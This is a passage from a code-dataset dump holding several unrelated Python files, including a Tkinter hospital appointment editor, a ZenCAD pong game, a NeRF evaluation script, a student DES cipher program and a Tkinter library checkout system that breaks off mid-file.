self.ugender.place(x=0, y=230)\n\n self.uaddress = Label(self.master, text=\"Address\", font=('arial 18 bold'))\n self.uaddress.place(x=0, y=270)\n\n self.uphone = Label(self.master, text=\"Phone Number\", font=('arial 18 bold'))\n self.uphone.place(x=0, y=310)\n\n self.utime = Label(self.master, text=\"Appointment time\", font=('arial 18 bold'))\n self.utime.place(x=0, y=350)\n\n #entry widget for name, age , gender etc\n self.ent1 = Entry(self.master, width=30,bd=3) #parameters include the parent window and width, breadth of the widget\n self.ent1.place(x=300, y=150) #placing in accordance to the specified coordinates\n self.ent1.insert(END, str(self.name1)) #inserting the string \n\n self.ent2 = Entry(self.master, width=30,bd=3)\n self.ent2.place(x=300, y=190)\n self.ent2.insert(END, str(self.age))\n\n self.ent3 = Entry(self.master, width=30,bd=3)\n self.ent3.place(x=300, y=230)\n self.ent3.insert(END, str(self.gender))\n\n self.ent4 = Entry(self.master, width=30,bd=3)\n self.ent4.place(x=300, y=270)\n self.ent4.insert(END, str(self.address))\n\n self.ent5 = Entry(self.master, width=30,bd=3)\n self.ent5.place(x=300, y=310)\n self.ent5.insert(END, str(self.phone))\n\n self.ent6 = Entry(self.master, width=30,bd=3)\n self.ent6.place(x=300, y=350)\n self.ent6.insert(END, str(self.time))\n\n self.update = Button(self.master, text=\"Update\", width=20, height=2, bg='lightblue',bd=3, command=self.update_db)\n self.update.place(x=400, y=390)\n\n self.delete = Button(self.master, text=\"Delete\", width=20, height=2, bg='red',bd=3, command=self.delete_db)\n self.delete.place(x=150, y=390)\n def update_db(self): #this method takes in the user input and uses the update sql query to update the data by the user\n\n self.var1 = self.ent1.get()\n self.var2 = self.ent2.get() \n self.var3 = self.ent3.get() \n self.var4 = self.ent4.get() \n self.var5 = self.ent5.get() \n self.var6 = self.ent6.get() \n#update query used fro name, age , gender etc\n query = \"UPDATE appointment SET name=?, age=?, gender=?, address=?, phone=?, time=? WHERE name LIKE ?\"\n c.execute(query, (self.var1, self.var2, self.var3, self.var4, self.var5, self.var6, self.namenet.get(),))\n conn.commit()\n tkinter.messagebox.showinfo(\"Updated\", \"Successfully Updated.\")\n def delete_db(self): #method uses the delete query and executes it \n sql2 = \"DELETE FROM appointment WHERE name LIKE ?\"\n c.execute(sql2, (self.namenet.get(),))\n conn.commit()\n tkinter.messagebox.showinfo(\"Success\", \"Deleted Successfully\")\n self.ent1.destroy()\n self.ent2.destroy()\n self.ent3.destroy()\n self.ent4.destroy()\n self.ent5.destroy()\n self.ent6.destroy()\n\nroot = Tk()\nb = Application(root)\nroot.geometry(\"800x500+0+0\")\nroot.resizable(False, False)\nroot.mainloop()\n","repo_name":"paradox20029/sit_221_task11.2","sub_path":"Hospital_management-python_tkinter-master/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18134031931","text":"from .consultas import *\n\n\ndef crear_dataSurvey(id_encuesta):\n datos_encuesta_creada = obtener_encuesta_creada(id_encuesta)\n questions = []\n # Se generan ordenados id_pregunta y enunciado por numero\n cantidad_total_preguntas = len(datos_encuesta_creada[\"ids_preguntas_alternativas\"])\n indexOp = 0\n for i in range(0,cantidad_total_preguntas):\n data = {\n \"id\": datos_encuesta_creada[\"ids_preguntas_alternativas\"].pop(0),\n \"type\": \"alternativa\",\n \"statement\": datos_encuesta_creada[\"enunciados_preguntas_alternativas\"].pop(0),\n \"alternatives\": []\n }\n cantidad_alternativas = datos_encuesta_creada[\"cantidad_opciones_por_pregunta\"].pop(0)\n j = 0\n while j < cantidad_alternativas:\n dataOption = {\n \"id\": datos_encuesta_creada[\"ids_opciones\"][indexOp],\n \"textAlt\": datos_encuesta_creada[\"strings_opciones\"][indexOp]\n }\n data[\"alternatives\"].append(dataOption)\n j += 1\n indexOp += 1\n questions.append(data)\n\n survey = db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first()\n\n fecha_fin_aux = \"\"\n if survey.fecha_fin == None:\n fecha_fin_aux = (datetime.now() + timedelta(days=7)).strftime(\"%d-%m-%Y\")\n else:\n fecha_fin_aux = survey.fecha_fin.strftime(\"%d-%m-%Y\")\n \n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": survey.titulo,\n \"description\": survey.descripcion,\n \"questions\": questions, \n \"end_date\": fecha_fin_aux,\n \"mail_subject\": survey.asunto_mail,\n \"mail_body\": survey.mensaje_mail,\n \"asigned\" : survey.total_asignados\n }\n\n return dataSurvey\n","repo_name":"mellokx/Proyecto-Semestral-IS2","sub_path":"application/estructuraInterfaz.py","file_name":"estructuraInterfaz.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17746276497","text":"#!/usr/bin/env python3\n\nimport time\nimport math\nimport random\n\nfrom zencad import *\nimport zencad.assemble\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nCTRWIDGET = None\nSLD0 = None\nSLD1 = None\n\nBALL_POSITION = [0, 0]\nBALL_SPEED_NORMAL = math.sqrt(150**2 * 2)\nBALL_SPEED = [\n BALL_SPEED_NORMAL*math.cos(deg(45)),\n BALL_SPEED_NORMAL*math.cos(deg(45))]\n\nBOX_WIDTH = 300\nBOX_LENGTH = 500\nPLAYER_OFF = 40\nT = 10\n\n\nclass Slider(QSlider):\n def __init__(self):\n super().__init__(Qt.Horizontal)\n self.setRange(-5000, 5000)\n self.setValue(0)\n self.setSingleStep(1)\n\n _value = QSlider.value\n\n def value(self):\n return self._value(self) / 10000 * (BOX_WIDTH-80)\n\n\nclass player(zencad.assemble.unit):\n def __init__(self):\n super().__init__()\n self.add(box(80, 10, 10, center=True))\n\n\nclass ball(zencad.assemble.unit):\n def __init__(self):\n super().__init__()\n self.add(sphere(5))\n\n\nplayer_one = player()\nplayer_two = player()\nball = ball()\n\nBOX = box(BOX_WIDTH+T*2, BOX_LENGTH+T*2+PLAYER_OFF*2, 20, center=True) - \\\n box(BOX_WIDTH, BOX_LENGTH+PLAYER_OFF*2, 20, center=True)\n\ndisp(player_one)\ndisp(player_two)\ndisp(ball)\ndisp(BOX)\n\n\ndef change_angle():\n global BALL_SPEED\n\n angle = math.atan2(BALL_SPEED[1], BALL_SPEED[0])\n angle += random.uniform(-0.2, 0.2)\n\n BALL_SPEED = [math.cos(angle) * BALL_SPEED_NORMAL,\n math.sin(angle) * BALL_SPEED_NORMAL]\n\n\ndef preanimate(wdg, animate_thread):\n global CTRWIDGET, SLD0, SLD1\n CTRWIDGET = QWidget()\n layout = QVBoxLayout()\n\n SLD0 = Slider()\n SLD1 = Slider()\n\n layout.addWidget(SLD1)\n layout.addWidget(SLD0)\n\n CTRWIDGET.setLayout(layout)\n CTRWIDGET.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.Dialog)\n CTRWIDGET.show()\n\n\nstime = time.time()\nlasttime = stime\n\n\ndef animate(wdg):\n global BALL_POSITION\n global lasttime\n curtime = time.time()\n DELTA = curtime - lasttime\n lasttime = curtime\n\n player_one_pos = SLD0.value()\n player_one_location = translate(SLD0.value(), -BOX_LENGTH/2-5, 0)\n player_one.relocate(player_one_location, view=True)\n\n player_two_pos = SLD1.value()\n player_two_location = translate(SLD1.value(), BOX_LENGTH/2+5, 0)\n player_two.relocate(player_two_location, view=True)\n\n BALL_POSITION[0] += BALL_SPEED[0] * DELTA\n BALL_POSITION[1] += BALL_SPEED[1] * DELTA\n\n if BALL_POSITION[0] > BOX_WIDTH/2:\n BALL_SPEED[0] = - BALL_SPEED[0]\n BALL_POSITION[0] = BOX_WIDTH/2\n change_angle()\n\n if BALL_POSITION[0] < -BOX_WIDTH/2:\n BALL_SPEED[0] = - BALL_SPEED[0]\n BALL_POSITION[0] = -BOX_WIDTH/2\n change_angle()\n\n if BALL_POSITION[1] > BOX_LENGTH/2:\n BALL_SPEED[1] = - BALL_SPEED[1]\n BALL_POSITION[1] = BOX_LENGTH/2\n if abs(player_two_pos - BALL_POSITION[0]) > 40:\n BALL_POSITION = [0, 0]\n change_angle()\n\n if BALL_POSITION[1] < -BOX_LENGTH/2:\n BALL_SPEED[1] = - BALL_SPEED[1]\n BALL_POSITION[1] = -BOX_LENGTH/2\n if abs(player_one_pos - BALL_POSITION[0]) > 40:\n BALL_POSITION = [0, 0]\n change_angle()\n\n ball.relocate(translate(BALL_POSITION[0], BALL_POSITION[1]), view=True)\n\n\ndef close_handle():\n CTRWIDGET.close()\n\n\nshow(animate=animate, preanimate=preanimate, close_handle=close_handle)\n","repo_name":"mirmik/zencad","sub_path":"zencad/examples/MiniGames/tennis.py","file_name":"tennis.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"81"} +{"seq_id":"6350201708","text":"import copy\r\nimport torch\r\nimport utils.multigpu as multigpu\r\nimport utils.utils as ut\r\nimport utils.volumrender as render\r\nimport numpy as np\r\nimport option as op\r\nfrom tqdm import tqdm\r\ndef eval_nerf_fine(ImgTensor,trainparams,camparams,modelout,savepath=None):\r\n numpic,H,W=ImgTensor.shape[0:3]\r\n\r\n ml,emb_list,coastRayTAlll,coastSigmaAlll,hashcodinglist=modelout\r\n\r\n numgpu=trainparams['numgpu']\r\n\r\n try:\r\n with torch.no_grad():\r\n meanparam=multigpu.meanParams(ml)\r\n n=0\r\n for para in trainparams['model'].parameters():\r\n para.copy_(meanparam[n])\r\n n=n+1\r\n torch.save(trainparams['model'].state_dict(),savepath+\"model_fine.p\")\r\n except:\r\n print(\"model to cpu error\")\r\n\r\n\r\n\r\n if trainparams['if_hash']:\r\n try:\r\n with torch.no_grad():\r\n n=0\r\n meanparam=multigpu.meanParams(emb_list)\r\n for para in trainparams['emb'].parameters():\r\n para.copy_(meanparam[n])\r\n n=n+1\r\n torch.save(trainparams['emb'].state_dict(),savepath+\"model_fine_emb.p\")\r\n except:\r\n print(\"embedding to cpu error\")\r\n\r\n\r\n numeval=10\r\n index=torch.ceil(torch.linspace(0,numpic-1,numeval)).to(torch.int)\r\n import matplotlib.pyplot as plt\r\n\r\n try:\r\n with torch.no_grad():\r\n print(\"saving colormap\")\r\n for i in range(numeval):\r\n imIndex=index[i]\r\n currentImg=ImgTensor[imIndex,...].to(torch.float32)\r\n currentr=camparams['r'][imIndex,...]\r\n currentt=camparams['t'][imIndex,...]\r\n\r\n rayo,rayd=ut.getRayKK(currentr,currentt,H,W,camparams['k'])\r\n\r\n rayo=ut.centralCrop(rayo[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n rayd=ut.centralCrop(rayd[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n currentImg=ut.centralCrop(currentImg[np.newaxis,...],scale=trainparams['centralcrop'])[0,...]\r\n\r\n rayo=rayo.permute(2,0,1)\r\n rayd=rayd.permute(2,0,1)\r\n currentImg=currentImg.permute(2,0,1)\r\n\r\n\r\n\r\n rayol=multigpu.datatoGPU(multigpu.splitImgToPatch(rayo,numgpu)[0],numgpu) # split on cpu\r\n raydl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[0],numgpu)\r\n splitHl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[1],numgpu)\r\n splitWl=multigpu.datatoGPU(multigpu.splitImgToPatch(rayd,numgpu)[2],numgpu)\r\n coastSigmaAllll=multigpu.datatoGPU(multigpu.splitImgToPatch(coastSigmaAlll[imIndex,...].permute(2,0,1),numgpu)[0],numgpu)\r\n for m in range(len(coastSigmaAllll)):\r\n coastSigmaAllll[m]=coastSigmaAllll[m].permute(1,2,0)\r\n\r\n\r\n colormap=torch.tensor(())\r\n depth=torch.tensor(())\r\n \r\n for j in range(numgpu): \r\n flatPoints,flatrayd,newRayT=render.getfinepoints(coastRayTAlll[imIndex,...],sigma=coastSigmaAllll[j],rayO=rayol[j].permute(1,2,0),rayD=raydl[j].permute(1,2,0),numFine=camparams['numFinesam'])\r\n\r\n coastraw=render.batch_enc(enc_hash=hashcodinglist[j],enc_freq=trainparams['enc_freq'],flatpoints=flatPoints,flatrayd=flatrayd,fn=ml[j],if_hash=trainparams['if_hash'],chunkSize=trainparams['chunkSize'])\r\n\r\n sigma,rgb=render.raw2rgb(coastraw,splitHl[j],splitWl[j],newRayT.shape[-1])\r\n\r\n colormapd,depthd,accd=render.rgb2output(sigma=sigma,rgb=rgb,rayT=newRayT)\r\n colormap=torch.concat((colormap,colormapd.to(torch.device(\"cpu\"))),dim=-2)\r\n depth=torch.concat((depth,depthd.to(torch.device(\"cpu\"))),dim=-1)\r\n\r\n \r\n colormap=colormap.detach().numpy()\r\n depth=depth.detach().numpy()\r\n currentImg=currentImg.permute(1,2,0).detach().numpy()\r\n plt.imsave(savepath+\"color\"+str(i)+\".png\",colormap/np.max(colormap))\r\n plt.imsave(savepath+\"depth\"+str(i)+\".png\",depth/np.max(depth))\r\n plt.imsave(savepath+\"gt\"+str(i)+\".png\",currentImg/np.max(currentImg))\r\n op.saveparams([trainparams,camparams],savepath)\r\n \r\n print(\"save pic done\")\r\n except Exception as e:\r\n #print('错误类型是',e.__class__.__name__)#except:#jia\r\n print('error saving:',e.__class__.__name__,e) #continue#jia\r\n\r\n","repo_name":"pulangk97/nerfPytorch","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"40310402687","text":"#DES.py @author Kai Barclay 2020\n#main method here\n#run this as: python3 DES.py\n\nfrom user import User\nfrom user import *\nfrom key import Key\nfrom mafs import Mafs\nfrom bits import *\nimport sys\n\ndef main(): #program flow\n print(\"Welcome to DES.\")\n end = False\n while end == False:\n i = User()\n if i.isEncryption() == True: #Encrypting\n print(\"Encrypting....\")\n print(\"Message: \" + i.getMessage())\n if i.isSingle() == True: #single DES\n print(\"Key: \" + i.getK1())\n e = DES(i.getMessage(), i.getK1())\n print(\"Cipher: \" + e)\n end = option1(e, i)\n else: #triple DES\n print(\"Key 1: \" + i.getK1())\n print(\"Key 2: \" + i.getK2())\n e = DES3(i.getMessage(), i.getK1(), i.getK2())\n print(\"Cipher: \" + e)\n end = option1(e, i)\n else: #Decrypting\n print(\"Decrypting....\")\n print(\"Cipher Text: \" + i.getMessage())\n if i.isSingle() == True: #single DES\n print(\"Key: \" + i.getK1())\n u = unDES(i.getMessage(), i.getK1())\n print(\"Plain Text: \" + toChar(u))\n end = option2()\n else: #triple DES\n print(\"Key 1: \" + i.getK1())\n print(\"Key 2: \" + i.getK2())\n e = DES3(i.getMessage(), i.getK1(), i.getK2())\n print(\"Cipher: \" + e)\n end = option2()\n\n\ndef DES(m, k): #encryption given message, key\n if str.isdecimal(m) == False:\n c = chunk(m)\n else:\n c = chop(m)\n key = Key(k)\n encrypt = \"\"\n for i in range(len(c)):\n math = Mafs(c[i], key)\n encrypt = encrypt + math.getFP()\n return encrypt\n\ndef unDES(m, k): #decryption given ciphertext (in binary or alpha), key\n key = Key(k)\n if str.isdecimal(m) == False:\n c = chunk(m)\n else:\n c = chop(m)\n key.invert()\n decrypt = \"\"\n for i in range(len(c)):\n math = Mafs(c[i], key)\n decrypt = decrypt + math.getFP()\n return decrypt\n\ndef DES3(m, k1, k2): #triple DES encryption\n return DES(unDES(DES(m, k1), k2), k1)\n\ndef unDES3(m, k1, k2): #triple DES decryption\n return unDES(DES(unDES(m, k1), k2), k1)\n\ndef chop(x): #splits binary string into list of 64 bit chunks\n split = []\n while x != \"\":\n s = \"\"\n for i in range(64):\n if x != \"\":\n s = s + x[0]\n x = x[1:]\n split.append(s)\n return split\n\ndef option1(e, i): #user menu A\n x = 'a'\n end = False\n while x == 'a':\n print(\"Do you wish to (d)ecipher, (r)estart, or (q)uit?\")\n x = input()\n if x == 'd':\n print(\"Decrypting....\")\n if i.isSingle():\n d = unDES(e, i.getK1())\n else:\n d = unDES3(e, i.getK1(), i.getK2())\n print(\"Deciphered: \" + toChar(d))\n elif x == 'r':\n break\n elif x == 'q':\n sys.exit(0)\n else:\n print(\"Invalid input, try again\")\n x = 'a'\n return end\n\ndef option2(): #user menu B\n x = 'a'\n end = False\n while x == 'a':\n print(\"Do you wish to (r)estart, or (q)uit?\")\n x = input()\n if x == 'r':\n break\n elif x == 'q':\n sys.exit(0)\n else:\n print(\"Invalid input, try again\")\n x = 'a'\n return end\n\nif __name__ == '__main__':\n main()\n","repo_name":"KaiFish/DES","sub_path":"DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28881666085","text":"import math\nimport numpy as np\n\ndef parse_input():\n dots, folds = open('Day13/puzzle_input.txt', 'r').read().split('\\n\\n')\n dots = set(tuple(int(i) for i in line.split(',')) for line in dots.split('\\n'))\n folds = [tuple((line.split('=')[0][-1], int(line.split('=')[1]))) for line in folds.split('\\n')]\n return dots, folds\n\ndef fold(dots, instruction):\n folded_dots = set()\n for dot in dots:\n if instruction[0] == 'x':\n if dot[0] > instruction[1]:\n new_dot = (2*instruction[1]-dot[0], dot[1])\n folded_dots.add(new_dot)\n else:\n folded_dots.add(dot)\n elif instruction[0] == 'y':\n if dot[1] > instruction[1]:\n new_dot = (dot[0], 2*instruction[1]-dot[1])\n folded_dots.add(new_dot)\n else:\n folded_dots.add(dot)\n return folded_dots\n\ndots, instructions = parse_input()\n\ndef fold_all(dots, instructions):\n for inst in instructions:\n dots = fold(dots, inst)\n return dots\n\ndef paper_print(dots):\n for i in range(max([y for x, y in dots]) + 1):\n print(''.join('#' if (j, i) in dots else ' ' for j in range(max([x for x, y in dots]) + 1)))\n\nprint(paper_print(fold_all(dots, instructions)))\n\n","repo_name":"Mechoj08/AdventOfCode21","sub_path":"Day13/day_13_1.py","file_name":"day_13_1.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27667991711","text":"import csv\nfrom tkinter import *\nfrom collections import Counter\nfrom matplotlib import pyplot as plt \nmylist = []\nfor i in range(1000,10000):\n mylist.append(i)\nmynewlist = mylist\nmylist2 = ['Book_1', 'Book_2', 'Book_1', 'Book_2', 'Book_2', 'Book_3', 'Book_1', 'Book_3', 'Book_4', 'Book_4']\nmylist3 = ['1','2','3','4','5','6','7','8','9','10']\ndata = open('database.txt', encoding = 'utf-8')\ncsv_data = csv.reader(data)\ndata_lines = list(csv_data)\nroot = Tk()\nroot.title(\"Library Management System\")\nmy_listbox = Listbox(root, bg = 'lawn green', height = 10, width = 60)\nmy_listbox.grid(row = 20, column = 1)\n\n#Above are all the global variables and value, a listbox is used to display all the ouputs\n\n\n#below is the first entry widget where you should enter the Book title you want to search up\n\nBooksearchinput = Label(root, text = 'Please enter Book Title:')\nBooksearchinput.grid(row = 0,column = 0) \n \nBookTitle = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book Title\nBookTitle.grid(row = 1 , column=0 ) \n\n\n# below is the function used to search for books\n\ndef search_for_books():\n with open('database.txt', 'r') as big_file:\n big_reader = csv.reader(big_file)\n for line in big_reader:\n if BookTitle.get() in line:\n global output\n my_listbox.insert(END, line)\n \n \n if BookTitle.get() not in mylist2:\n my_listbox.insert(END, \"Invalid\")\n\nSearchButton = Button(root, text = \"Search\", padx = 5, pady = 5,command = search_for_books,fg='red')\n\n\nSearchButton.grid(row = 2, column = 0) \n\n#after input is put, press the search button to get back the books with that title\n\n\n\n# BEFORE CHECKING OUT A BOOK, ALWAYS SEARCH FOR THE BOOK WITH THE SEARCH BUTTON AS THE DETAILS ARE IMPORTANT TO FILL IN AND CHECK THE AVAILABILITY OF THE BOOK \n\n\n#below, are the entries required for a book checkout. First enter Book title, Serial no of book, do you want to checkout(Yes or No), ISBN, MEMBER ID, today's date\n#All the boxes have specification above them about what to do.\n#please fill in all the boxes then press the checkout button\n\nBookCheckoutBooktitle = Label(root, text = 'Please enter Book Title: ')\nBookCheckoutBooktitle.grid(row = 0, column = 1)\n\nBooktitle2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book Title\nBooktitle2.grid(row = 1, column = 1)\n\nBookCheckoutSerialNumber = Label(root, text = 'Please enter Serial number of book: ')\nBookCheckoutSerialNumber.grid(row = 2, column = 1)\n\n\nBookSerial = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Please enter serial number of book which has 0 under ID column\nBookSerial.grid(row = 3, column = 1)\n\nBookCheckoutDoyouCheckout= Label(root, text = 'Do you want to checkout? (Yes or No): ')\nBookCheckoutDoyouCheckout.grid(row = 4, column = 1)\n\n\nCheckoutresponse = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Do you want to checkout?\nCheckoutresponse.grid(row = 5, column = 1)\n\nBookCheckoutISBN = Label(root, text = \"Please enter ISBN: \")\nBookCheckoutISBN.grid(row = 6, column = 1)\n\nISBN = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #ISBN\nISBN.grid(row = 7, column = 1)\n\nBookCheckoutMemberID = Label(root, text = \"Please enter Member's ID: \")\nBookCheckoutMemberID.grid(row = 8, column = 1) \n\nMemberID = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Member ID\nMemberID.grid(row = 9, column = 1)\n\nBookCheckoutDate = Label(root, text = \"Please enter present Date: \")\nBookCheckoutDate.grid(row = 10, column = 1) \n\n\nCheckoutDate = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Checkout Date\nCheckoutDate.grid(row = 11, column = 1)\n\n#below is the book checkout function as explained in the bookcheckout.py file\n \n\ndef book_checkout(): \n \n \n if Booktitle2.get() not in mylist2:\n error2 = \"Not valid\"\n print(error2)\n output3 = Label(root, text = error2)\n output3.pack()\n with open('database.txt', 'r') as big_file:\n big_reader = csv.reader(big_file)\n for line in big_reader:\n if Booktitle2.get() in line:\n my_listbox.insert(END, line)\n #(Please enter serial number of book which has 0 under ID column)\n\n \n\n \n if BookSerial.get() in mylist3:\n if Booktitle2.get() == 'Book_1' and BookSerial.get() == mylist3[0]:\n if data_lines[1][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[1]:\n if data_lines[2][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() == 'Book_1' and BookSerial.get() ==mylist3[2]:\n if data_lines[3][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[3]:\n if data_lines[4][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[4]:\n if data_lines[5][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_3' and BookSerial.get() ==mylist3[5]:\n if data_lines[6][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() == 'Book_1' and BookSerial.get() ==mylist3[6]:\n if data_lines[7][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n if Booktitle2.get() =='Book_3' and BookSerial.get() ==mylist3[7]:\n if data_lines[8][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_4' and BookSerial.get() ==mylist3[8]:\n if data_lines[9][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_4' and BookSerial.get() ==mylist3[9]:\n if data_lines[10][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n else:\n my_listbox.insert(END, \"\")\n \n \n if BookSerial.get() not in mylist3:\n my_listbox.insert(END, \"Entry not valid\") \n \n if Booktitle2.get() not in mylist2 :\n my_listbox.insert(END, \"Invalid!\") \n \n \n\n if Checkoutresponse.get() == 'Yes':\n my_listbox.insert(END, \"ISBN Please\")\n \n with open('database.txt', 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n for line in csv_reader:\n if ISBN.get() in line and int(MemberID.get())in mynewlist:\n my_listbox.insert(END, \"Book Withdrawn successfully!\")\n \n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '1':\n data_lines[1][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '2':\n data_lines[2][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '3':\n data_lines[3][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '4':\n data_lines[4][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '5':\n data_lines[5][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484110' and BookSerial.get() == '6':\n data_lines[6][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '7':\n data_lines[7][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484110' and BookSerial.get() == '8':\n data_lines[8][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484200' and BookSerial.get() == '9':\n data_lines[9][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484200' and BookSerial.get() == '10':\n data_lines[10][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n \n my_listbox.insert(END, \"Thank You\")\n my_listbox.insert(END, (\"ID : %s , Book Title : %s, Member ID : %s, ISBN : %s, Checkout Date : %s\" %(BookSerial.get(),Booktitle2.get(),MemberID.get(),ISBN.get(),CheckoutDate.get())))\n my_listbox.insert(END, \"Please remember this information while returning your book\")\n \n \n break\n \n \n \n \n \n elif ISBN.get() not in line and int(MemberID.get()) not in mynewlist:\n my_listbox.insert(END, \"Invalid!\")\n \n break\n elif Checkoutresponse.get() == 'No':\n my_listbox.insert(END, \"Bye\")\n \n\n#After all the inputs are put in their respective boxes, only then click the checkout button\n \nCheckout_button = Button(root, text = \"Checkout\", padx = 5, pady = 5, command = book_checkout,fg='red')\n\nCheckout_button.grid(row = 12, column = 1)\n\n\n\n\n\n#below, are the entries required for a book return. First enter Do you want to return a book(Yes or NO) , ISBN, MEMBER ID, today's date, Serial number of book, checkout date\n#All the boxes have specification above them about what to do.\n#please fill in all the boxes then press the return button\n\nBookReturnDoyouwanttoreturn = Label(root, text = \"Do you want to return a book?(Yes or No): \")\nBookReturnDoyouwanttoreturn.grid(row = 4, column = 0)\n\nReturnresponse = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Do you wish to return a book?\nReturnresponse.grid(row = 5, column = 0)\n\nBookReturnMemberID = Label(root, text = \"Please enter Member's ID: \")\nBookReturnMemberID.grid(row = 6, column = 0)\n\nMemberID2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Member ID\nMemberID2.grid(row = 7, column = 0)\n\nBookReturnISBN = Label(root, text = \"Please enter ISBN: \")\nBookReturnISBN.grid(row = 8, column = 0) \n \n\nISBN2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #ISBN\nISBN2.grid(row = 9, column = 0)\n\nBookReturnBooktitle = Label(root, text = \"Please enter Book Title: \")\nBookReturnBooktitle.grid(row = 10, column = 0) \n\nBooktitle3 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book 